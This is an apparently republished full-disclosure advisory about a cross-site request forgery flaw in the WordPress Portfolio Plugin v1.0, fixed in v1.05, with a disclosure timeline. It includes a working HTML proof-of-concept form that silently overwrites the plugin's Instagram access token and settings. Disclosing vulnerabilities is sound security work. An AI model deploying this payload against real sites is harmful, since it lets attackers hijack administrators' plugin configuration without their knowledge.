Quantcast
Channel: MondoUnix » INSTAGRAM
Viewing all articles
Browse latest Browse all 2

WordPress Portfolio 1.0 Cross Site Request Forgery

0
0
# Title: Cross-Site Request Forgery Vulnerability in Portfolio Plugin
Wordpress Plugin v1.0
# Submitter: Nitin Venkatesh
# Product: Portfolio Plugin Wordpress Plugin
# Product URL: https://wordpress.org/plugins/portfolio-by-lisa-westlund/
# Vulnerability Type: Cross-site Request Forgery [CWE-352]
# Affected Versions: v1.0
# Tested versions: v1.0
# Fixed Version: v1.05
# Link to code diff:
https://plugins.trac.wordpress.org/changeset/1175403/portfolio-by-lisa-westlund
# Changelog:
https://plugins.trac.wordpress.org/log/portfolio-by-lisa-westlund
# CVE Status: None/Unassigned/Fresh
 
## Product Information:
 
Use Instagram to display your portfolio. Choose whether to display all
images from your account, or only the ones you tag with a custom hashtag.
 
## Vulnerability Description:
 
The admin form in Portfolio Plugin v1.0 is susceptible to CSRF.
 
## Proof of Concept:
 
<form action="
http://localhost/wp-admin/options-general.php?page=instagram-portfolio"
method="post">
<input type="hidden" name="wplw_form_submitted" value='Y' />
<input type="hidden" name="wplw_instagram_access_token" value='evil-token1'
/>
<input type="hidden" name="wplw_instagram_userID" value='nitstorm' />
<input type="hidden" name="wplw_hashtag" value='csrf' />
<input type="hidden" name="wplw_settings_submit" value='Save' />
<input type="submit" value="submit" />
</form>
 
## Solution:
 
Upgrade to v1.05 or later.
 
## Disclosure Timeline:
 
2015-06-03 - Discovered. Mailed developer.
2015-06-05 - Updated v1.05 released.
2015-07-20 - Publishing disclosure on FD mailing list.
 
## Disclaimer:
 
This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.

(141)


Viewing all articles
Browse latest Browse all 2

Latest Images

Trending Articles





Latest Images